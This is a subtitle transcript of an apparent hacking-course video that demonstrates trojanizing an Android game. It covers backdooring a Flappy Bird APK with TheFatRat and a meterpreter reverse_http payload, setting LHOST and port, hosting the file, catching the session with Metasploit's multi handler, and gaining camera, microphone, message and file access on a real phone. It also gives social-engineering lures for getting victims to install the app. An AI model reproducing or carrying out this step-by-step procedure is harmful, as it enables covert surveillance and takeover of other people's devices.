Would you like to inspect the original subtitles? These are the user uploaded subtitles that are being translated: 1 00:00:00,340 --> 00:00:06,140 In this video, I'd like to show you how to embed evil code into Android apps. 2 00:00:06,240 --> 00:00:12,880 So that when the app is executed on an Android device, the user will see a normal app or normal game 3 00:00:12,880 --> 00:00:17,480 that they can use but at the same time our backdoor will run at the background 4 00:00:17,660 --> 00:00:22,820 and will have full control over that Android device, whether it's a phone, a tablet 5 00:00:22,920 --> 00:00:24,660 or anything that runs Android. 6 00:00:25,240 --> 00:00:30,480 Now doing this is actually not very hard and the first step is you want to go 7 00:00:30,480 --> 00:00:34,700 and download the application that you want the target person to see, 8 00:00:34,880 --> 00:00:38,340 so you want to social engineer them to install that application. 9 00:00:38,540 --> 00:00:44,260 You can use any application you want, so you can just use an application for a restaurant, for example, 10 00:00:44,400 --> 00:00:48,420 and then social engineer your target to install that app to get a certain offer 11 00:00:48,880 --> 00:00:53,340 or you can just backdoor a game and then pretend to be the target person's friend 12 00:00:53,500 --> 00:00:57,040 and send them that game saying, "Oh, look at my new app or new game." 13 00:00:57,820 --> 00:01:02,320 I'm going to go to this website which is called apkmirror.com to download my apk. 14 00:01:02,400 --> 00:01:06,240 Now there's a lot of websites that allow you to do that, but I choose to use this one 15 00:01:06,720 --> 00:01:10,760 and I'm gonna look for a very simple game called Flappy Bird and you've probably heard of it. 16 00:01:14,240 --> 00:01:17,280 You can see I have the game in here, I'm gonna click on it 17 00:01:18,180 --> 00:01:21,480 and then I'm gonna scroll down and download the apk. 18 00:01:26,100 --> 00:01:29,580 I'm going to click OK to save it and that's it it's saved for me. 19 00:01:29,880 --> 00:01:31,800 So, I'm gonna close this 20 00:01:33,140 --> 00:01:39,900 and if I go to my files, you'll see I'm in my Downloads already and I can see the file right here. 21 00:01:40,460 --> 00:01:45,080 Now I'm going to rename this and I'm just gonna call it 'flappy bird'. 22 00:01:47,060 --> 00:01:48,440 Okay, now this is all good. 23 00:01:49,260 --> 00:01:52,000 Now we can go ahead and generate our backdoor. 24 00:01:53,480 --> 00:01:58,500 We can use TheFatRat to do that and we seen how to install and use TheFatRat before, 25 00:01:58,920 --> 00:02:04,860 but before I do that you need to configure Kali to use Java 8 by default 26 00:02:05,460 --> 00:02:10,420 because by default Kali will use the latest version of Java available 27 00:02:10,660 --> 00:02:17,080 and the latest version cannot be used to recompile the backdoor that we're going to create. 28 00:02:17,900 --> 00:02:25,460 So to change the default version of Java used by Kali you need to type 'update alternatives' 29 00:02:25,960 --> 00:02:30,980 and we're going to say I want to 'config' the 'java' version, 30 00:02:31,640 --> 00:02:32,780 so I'm gonna hit Enter 31 00:02:33,900 --> 00:02:38,900 and as you can see it can list all the Java versions available in Kali Linux 32 00:02:39,460 --> 00:02:46,280 and as you can see we have a star beside the auto mode which we'll choose Java 10 by default. 33 00:02:48,400 --> 00:02:55,300 So what I want to do is I'm going to enter number two to set Kali to use Java 8 by default. 34 00:02:55,960 --> 00:02:59,780 So, all we're gonna do is just enter number 2 and hit Enter. 35 00:03:00,880 --> 00:03:03,980 This will configure Kali to use Java 8 by default 36 00:03:04,100 --> 00:03:10,000 and this way we'll be able to use Kali to decompile the existing apk that we just downloaded 37 00:03:10,220 --> 00:03:15,740 and then inject a backdoor into it and recompile it to an 'apk' again. 38 00:03:17,000 --> 00:03:20,200 Now TheFatRat is going to do all of this for us, like I said. 39 00:03:20,580 --> 00:03:27,460 So, I'm going to navigate to the directory where I have it installed, which is an opt, TheFatRat 40 00:03:29,000 --> 00:03:33,440 and then we're gonna run it as usual by doing ./fatrat. 41 00:03:38,300 --> 00:03:43,700 Now, I want to generate an Android backdoor, so that's going to be number five here 42 00:03:45,880 --> 00:03:51,980 and the first thing it's asking me for my IP address as you can see it's automatically suggesting 43 00:03:51,980 --> 00:03:54,720 that my IP address is this, which is correct. 44 00:03:55,140 --> 00:04:00,560 If you're not sure about your IP address, you can split the screen, run 'ifconfig' and see the IP 45 00:04:00,660 --> 00:04:01,940 and we've seen this before. 46 00:04:02,600 --> 00:04:08,020 And you can probably notice that my IP right now is different than the NAT network IP. 47 00:04:08,400 --> 00:04:15,220 This is because I'm going to be targeting an android device connected to my Wi-Fi network. 48 00:04:15,740 --> 00:04:23,520 Therefore, I set my network settings, so if we go here, go to devices go to network 49 00:04:23,520 --> 00:04:30,540 and click on network settings, you'll see I have the network settings set to use a bridged adapter. 50 00:04:31,160 --> 00:04:37,340 So, basically what I have right now is my host machine and my target Android device 51 00:04:37,340 --> 00:04:45,020 connected both the same Wi-Fi network and this virtual machine Kali is said to use a bridged adapter. 52 00:04:45,020 --> 00:04:50,680 That's why it's getting an IP that is within the subnet of the Wi-Fi network 53 00:04:50,680 --> 00:04:56,160 and this way I'll be able to hack any computer connected to my Wi-Fi network. 54 00:04:57,360 --> 00:05:01,200 Now, you can also run this attack and all the other attacks that you seen so far 55 00:05:01,200 --> 00:05:04,140 on computers connected to different networks, 56 00:05:04,560 --> 00:05:07,240 but we're going to talk about that later on in the course. 57 00:05:07,440 --> 00:05:12,520 For now, we're just gonna focus on hacking computers connected to the same network 58 00:05:12,520 --> 00:05:14,140 or to the NAT network. 59 00:05:15,320 --> 00:05:20,700 So I'm gonna put the IP as shown in here, which is 192.168.0.38, 60 00:05:22,380 --> 00:05:28,680 then it's asking me for the port that I want to use on my payload and I'm gonna set this to '8080'. 61 00:05:30,080 --> 00:05:33,860 Now, it's asking me for the app or the game that I want to backdoor 62 00:05:34,300 --> 00:05:41,000 and as we seen before this is in my Downloads and it's called flappybird.apk 63 00:05:42,540 --> 00:05:48,420 So we're gonna set the path root/Downloads/flappybird.apk. 64 00:05:49,380 --> 00:05:54,660 I'm gonna hit Enter and it's going to ask me what payload do I want to use, 65 00:05:55,040 --> 00:06:00,380 we're going to use android/meterpreter/reverse_http, so I'm gonna put number 1, 66 00:06:02,660 --> 00:06:07,780 then it's gonna ask me for the method that it should use to backdoor the apk 67 00:06:08,020 --> 00:06:10,980 and we're going to use number one for the latest method 68 00:06:11,720 --> 00:06:17,780 and now TheFatRat is going to first of all create an 'apk' backdoor, decompile the app, 69 00:06:17,860 --> 00:06:24,520 decompile the backdoor, inject the app into the backdoor, sign the new backdoored app 70 00:06:24,520 --> 00:06:30,520 and then generate an apk that when executed it'll run the apps that we selected, 71 00:06:30,800 --> 00:06:35,380 but at the same time it'll run our backdoor in the background. 72 00:06:36,640 --> 00:06:42,500 So now the backdoor is generated and as you can see it's giving us the path where the backdoor is stored. 73 00:06:43,300 --> 00:06:48,080 So I'm gonna copy this and then it's asking me if I want to start the listener 74 00:06:48,360 --> 00:06:51,140 and I'm gonna say no because I'm gonna do this manually. 75 00:06:52,080 --> 00:06:53,140 So, that's it we're done. 76 00:06:53,140 --> 00:06:58,420 I'm gonna hit Enter and I'm gonna enter '17' to exit TheFatRat. 77 00:07:00,500 --> 00:07:07,400 Now, I want to copy the backdoor that we just generated to my evil files directory, 78 00:07:07,560 --> 00:07:12,840 but I also want to rename it so we know we can use the 'cp' command to copy, 79 00:07:13,240 --> 00:07:19,080 but we can use the 'mv' command to move, so we're going to move a file to another place 80 00:07:19,080 --> 00:07:20,980 and rename it in the process. 81 00:07:21,520 --> 00:07:28,940 So the file that I want to move is stored in here and it's called app_backdoor.apk 82 00:07:29,640 --> 00:07:37,660 and first of all I want to move this to my var/www/html/evil-files 83 00:07:37,660 --> 00:07:41,740 and I want to call it flappybird.apk. 84 00:07:43,240 --> 00:07:47,580 So, the syntax of this command is very similar to the 'cp' command. 85 00:07:47,980 --> 00:07:51,180 First, you give it the file that you want to move 86 00:07:51,180 --> 00:07:58,200 and second you give it the location where you want to move the file to, follow it by the new file name. 87 00:07:58,620 --> 00:08:07,040 So now when I move this file the app_backdoor.apk, when it goes into my var/www/evil-files, 88 00:08:07,180 --> 00:08:11,340 it'll actually be renamed to flappybird.apk. 89 00:08:12,800 --> 00:08:18,700 So I'm gonna hit Enter and that's moved there and now we're ready to go and test the backdoor, 90 00:08:19,280 --> 00:08:23,253 but before we run it as you know, because we're using a reverse connection, 91 00:08:23,260 --> 00:08:27,680 we need to listen for incoming connections and I spent a full lecture 92 00:08:27,680 --> 00:08:31,440 showing you how to do that using Meatasploit's multi handler. 93 00:08:31,540 --> 00:08:35,100 So, first I'm gonna do 'msfconsole' to run Metasploit 94 00:08:36,440 --> 00:08:40,280 and I've already configured my handler to use the right options. 95 00:08:40,280 --> 00:08:42,341 If you don't remember how to do this, 96 00:08:42,341 --> 00:08:46,140 please go back and refer to the lecture where I show how to use it. 97 00:08:47,000 --> 00:08:51,280 So, right now I'm only gonna do show options to show you the right options, 98 00:08:51,880 --> 00:08:57,560 so like we did before you can see that I'm using an exploit multi handler to listen for incoming connections 99 00:08:57,860 --> 00:09:03,280 and I set my payload to android/meterpreter/reverse_http, 100 00:09:03,280 --> 00:09:06,360 the same payload that I picked when I generated the back door 101 00:09:06,460 --> 00:09:11,680 and this is always the same idea, we always pick in the handler the same payload that we pick 102 00:09:11,820 --> 00:09:13,400 when we generate the back door. 103 00:09:14,660 --> 00:09:20,440 You can also see that I set my LHOST to 192.168.0.38 and the port to '8080', 104 00:09:20,620 --> 00:09:24,920 again, the same options that I said when I created my backdoor. 105 00:09:25,640 --> 00:09:28,680 So I'm just going to exploit to listen for incoming connections now 106 00:09:29,180 --> 00:09:30,860 and that's it we're good to go. 107 00:09:31,040 --> 00:09:35,520 Now let's go to the Android device, download the backdoor and see if it works. 108 00:09:36,520 --> 00:09:42,500 Now, right here I have my HTC One device, it's a real Android device, this is not a virtual machine 109 00:09:42,860 --> 00:09:46,700 and this device is connected to my network. 110 00:09:47,400 --> 00:09:49,360 So I'm gonna go to my browser 111 00:09:50,420 --> 00:09:57,260 and I'm just going to download the file, so I want to go to 192.168.0.38 112 00:09:57,480 --> 00:10:04,860 and I want to download the file from evil-files/flappybird.apk. 113 00:10:09,060 --> 00:10:14,960 Now as you can see the file is downloaded so I'm gonna go from here 114 00:10:15,460 --> 00:10:19,100 and install the file, so I'm just gonna click it to install it 115 00:10:20,680 --> 00:10:24,560 then it's going to show me all the permissions that the file is asking for, 116 00:10:24,560 --> 00:10:28,040 so I'm just going to scroll down and click on install. 117 00:10:29,780 --> 00:10:35,580 Now as you can see we have a normal icon for Flappy Bird and if the now the app is installed. 118 00:10:35,580 --> 00:10:38,840 So you can open it from here or click on done, I'm just going to do done 119 00:10:39,360 --> 00:10:42,260 and then I'm just going to go on all my applications 120 00:10:43,260 --> 00:10:47,580 and you can see I have the app installed here and it's called Flappy Bird. 121 00:10:47,860 --> 00:10:50,280 So, I'm just gonna tap that to run the app 122 00:10:52,020 --> 00:10:55,920 and you see that I'm gonna just gonna get a normal game, that I can play. 123 00:11:01,560 --> 00:11:09,440 Okay, but if we go back to the Kali machine, you'll see that we got a 'meterpreter' session 124 00:11:09,600 --> 00:11:16,760 from the target device, from the target Android device and I can just do 'sysinfo' to confirm that 125 00:11:17,800 --> 00:11:21,900 and as you can see now I managed to gain full access to this Android device. 126 00:11:22,340 --> 00:11:27,500 Now I can access the camera access the mics and messages, access the files 127 00:11:27,500 --> 00:11:33,720 and do anything I want on that device and we managed to do this using a legitimate app 128 00:11:33,720 --> 00:11:36,780 and we injected our code in that app. 129 00:11:37,940 --> 00:11:42,300 So this opens a huge number of attack strategies you can pretend to be a friend 130 00:11:42,300 --> 00:11:46,740 and send an app to the person, you can pretend to be Facebook for example until the person 131 00:11:46,750 --> 00:11:51,460 there is a new update and download it, you can pretend to be a local restaurant 132 00:11:51,460 --> 00:11:57,380 and send the flyer into the house and ask the person to download a file using a QR code. 133 00:11:57,380 --> 00:12:02,060 There is a huge number of ways to use this to hack into your target. 134 00:12:02,540 --> 00:12:04,600 For now we're not talking about delivery methods, 135 00:12:04,600 --> 00:12:07,640 so yeah I just want to show you the whole technique behind it 136 00:12:07,780 --> 00:12:13,060 and as you can see we can hack into any Android phone using any app that we want. 14353